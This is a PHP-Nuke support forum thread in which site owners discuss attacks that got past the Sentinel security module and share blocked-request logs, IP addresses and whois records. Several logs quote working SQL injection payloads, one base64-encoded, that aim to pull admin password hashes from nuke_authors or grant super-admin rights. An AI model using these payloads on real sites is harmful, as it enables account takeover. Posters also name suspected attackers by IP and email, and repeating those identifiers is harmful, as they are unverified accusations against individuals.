HACKED with sentinal 2.2.0 installed

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

mds, Thanks! And keep in mind there's a good chance that he spoofed the IP, but I always send the reports in anyway Wink

Sells PC To Pay For Divorce Joined: Posts: 5661

well it all depends to what kind of connection he has,dyn or static..
and believe me...if they are good enough to hack your site they wont be stupid enough to use their own ip.

good step is to set the proxy blocker to on.
but also has consequences...

Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

Raven wrote:

mds, Thanks! And keep in mind there's a good chance that he spoofed the IP, but I always send the reports in anyway Wink

right, i thought of this as well..

hitwalker wrote:

well it all depends to what kind of connection he has,dyn or static..
and believe me...if they are good enough to hack your site they wont be stupid enough to use their own ip.

good step is to set the proxy blocker to on.
but also has consequences...

can you give me an example of the consequences ?

also , i know its off topic from the rest of the thread but as of bbtonuke version 2.0.13 or so, wasnt the update supposed to take the forum version out of the footer / copyright area ? mine still shows...2.0.14....

Posted: Wed Jun 08, 2005 10:42 am

well some people without any bad things in mind use a procy or its simple the provider...
as for turning the proxy on will result in banning the person or redirecting them.

Posted: Wed Jun 08, 2005 11:06 am

Ok, will addeing the IP to the protected list cure this ?

Posted: Wed Jun 08, 2005 12:01 pm

probably...im not 100 percent sure...
atleast you can try....

Posted: Wed Jun 08, 2005 12:16 pm

No! You don't want to add the IP to the protected list, you want to add it to the banned list.

Posted: Wed Jun 08, 2005 1:32 pm

yeah something like that...
i think its the sun.. Laughing

Posted: Wed Jun 08, 2005 3:12 pm

64bitguy wrote:

No! You don't want to add the IP to the protected list, you want to add it to the banned list.

lol no not the IP of the hacker of course that 1 goes to the ban list

the IP if a person is blocked because of sentinal proxy protection

Posted: Thu Jun 09, 2005 2:22 am

No problem. Yea, after finding that IP I was aware of being visited frequently in the past by the same guy... Doh! Had I only known... lol

Oh well, live and learn I guess.

EDIT: Oops, missed this second page! lol Yea, the IP could easily be spoofed, although I have recieved about 50 hits on my banned page redirect setup from those IPs already, so...

Posted: Thu Jun 09, 2005 9:59 am

i agree but thanks to raven we have a resource of very knowlegable people who can can help us RavensScripts

Posted: Sat Jun 11, 2005 9:28 am

well it looks like they tried to hack again heres the email and the ip lookup info this they were caught and blocked RavensScripts

:

Date & Time: 2005-06-10 12:08:50 PDT GMT -0700
Blocked IP: 81.215.140.100
User ID: Anonymous (1)
Reason: Abuse-Author
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Query String: www.XX.com/admin.php
Get String: www.XX.com/admin.php
Post String:
www.XXX.com/admin.php?admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=mod_authors&Submit=Display
Forwarded For: none
Client IP: none
Remote Address: 81.215.140.100
Remote Port: 1229
Request Method: POST

Location: Turkey (high)

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools may need to be adjusted. See
% http://www.ripe.net/db/news/abuse-proposal-20050331.html
% for more details.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to '81.215.128.0 - 81.215.143.255'

inetnum: 81.215.128.0 - 81.215.143.255
netname: TurkTelekom
descr: ADSL-MET-Acibadem-Dynamic Pool
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
notify: ***@turktelekom.com.tr
changed: ***@turktelekom.com.tr 20050425
source: RIPE

role: TT Administrative Contact Role
address: Turk Telekom
address: Bilisim Aglari Dairesi
address: Aydinlikevler
address: 06103 ANKARA
phone: +90 312 313 1950
fax-no: +90 312 313 1949
e-mail: *****@ttnet.net.tr
admin-c: BADB3-RIPE
tech-c: ZA66-RIPE
tech-c: ZA196-RIPE
tech-c: LA109-RIPE
tech-c: NO638-RIPE
nic-hdl: TTBA1-RIPE
notify: ***@turktelekom.com.tr
mnt-by: AS9121-MNT
changed: ***@telekom.gov.tr 20000608
changed: ***@telekom.gov.tr 20001020
changed: ***@telekom.gov.tr 20010615
changed: ***@turktelekom.com.tr 20040903
source: RIPE

% Information related to '81.215.128.0/17AS9121'

route: 81.215.128.0/17
descr: TurkTelecom
origin: AS9121
mnt-by: AS9121-MNT
changed: ***@turktelekom.com.tr 20040927
source: RIPE

Posted: Sun Jun 12, 2005 10:03 am

and tried again

Date & Time: 2005-06-12 02:44:31 PDT GMT -0700
Blocked IP: 85.96.71.187
User ID: Anonymous (1)
Reason: Abuse-Union
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
FunWebProducts)
Query String:
www.xx.com//modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND
pm.privmsgs_type=-99 UNION SELECT
aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*
Get String:
www.xx.com//modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND
pm.privmsgs_type=-99 UNION SELECT
aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*
Post String: www.xx.com//modules.php
Forwarded For: none
Client IP: none
Remote Address: 85.96.71.187
Remote Port: 3061
Request Method: GET

Posted: Wed Jun 15, 2005 1:11 pm

TheLoneInventor wrote:

65.19.134.2 - is the one I believe was used to hack the site, through the forums by the look of it. 2608 URLs were hit by this IP from the kralkayra username.

That IP is familiar...
65.19.169.235 was used on my site

Code:

IP Address     Last Viewed           Hits 





65.19.169.235  2005-05-27 @ 01:59:10 2169

all pretty much within an hour's time.

Posted: Thu Jun 23, 2005 7:30 am

65.19.169.235 OmniExplorer_Bot/1.07 (+http://www.omni-explorer.com) Internet Categorizer is one of the bad bots doesn´t read robots.txt using different Ip´s and I heard also about different User Agent Strings.

registered · Posted: Thu Jun 23, 2005 12:12 pm

...I caught Iranians trying to hack my site this morning.

They were trying to breach admin.php with a SQL exploit on an ODP (Open Directory Project) module I'm developing.

If you're in a 'banning' mood, here's their URL: 217.219.194.163

If you'd like send 'em an E-card, their addy is spynet.com@gmail.com ROTFL

Hangin' Around Joined: Jun 15, 2006 Posts: 36

I just got hit Feb 5th and had to recreate the actual authors table, the whole table was gone. Gonna look at the logs. Here is the user accounts, different than from the other thread:

User Name maxhex
User Email maxhex911@hotmail.com
User RegDate February 05, 2009 12:13:52 PM
UserIP-Port-MX 62.120.67.228:9049
Activation Link http://xxxx.com/modules.php?name=Your_Account&op=activate&username=maxhex&check_num=xxxx

Another IP logged: 65.55.209.69, turns out to be microsoft, spoofed?

Posted: Tue Feb 10, 2009 5:22 pm

No this is http://whois.domaintools.com/65.55.209.69

Maxhex is a new young arabic player I believe.

Do you have your own server ?

Is your Sentinel up- to-date ?

This is just such an old thread.

Sentinel 2.2.0 is history Smile

Posted: Tue Feb 10, 2009 5:54 pm

Susann wrote:

No this is http://whois.domaintools.com/65.55.209.69

Maxhex is a new young arabic player I believe.

Do you have your own server ?

Is your Sentinel up- to-date ?

This is just such an old thread.

Sentinel 2.2.0 is history Smile

Hi,

I have a shared server, sentinel is 2.6.01

Posted: Tue Feb 10, 2009 6:12 pm

Onnig, please do not double post. I am locking your duplicate post from http://www.ravenphpscripts.com/modules.php?name=Forums&file=viewtopic&p=131229#131229

Posted: Tue Feb 10, 2009 6:40 pm

Raven wrote:

Onnig, please do not double post. I am locking your duplicate post from http://www.ravenphpscripts.com/modules.php?name=Forums&file=viewtopic&p=131229#131229

ok, sorry about that.

Posted: Wed Feb 11, 2009 3:31 am

Onnig, did you already find out how they got in to prevent this in the future ?
I have somewhere a feeling its not the standard way and therefore you will possible need to ask your host also.

Posted: Wed Feb 11, 2009 10:12 am

I was checking my logs and that maxhex guy was doing a lot of the password recovery requests. I couldn't find anything else in my logs. Is there a known vulnerability?

Posted: Wed Feb 11, 2009 5:01 pm

Maybe send your log or the parts to Evaders.
So he can take a look and you don´t need to post more info here.

Posted: Wed Feb 11, 2009 5:11 pm

through private messaging?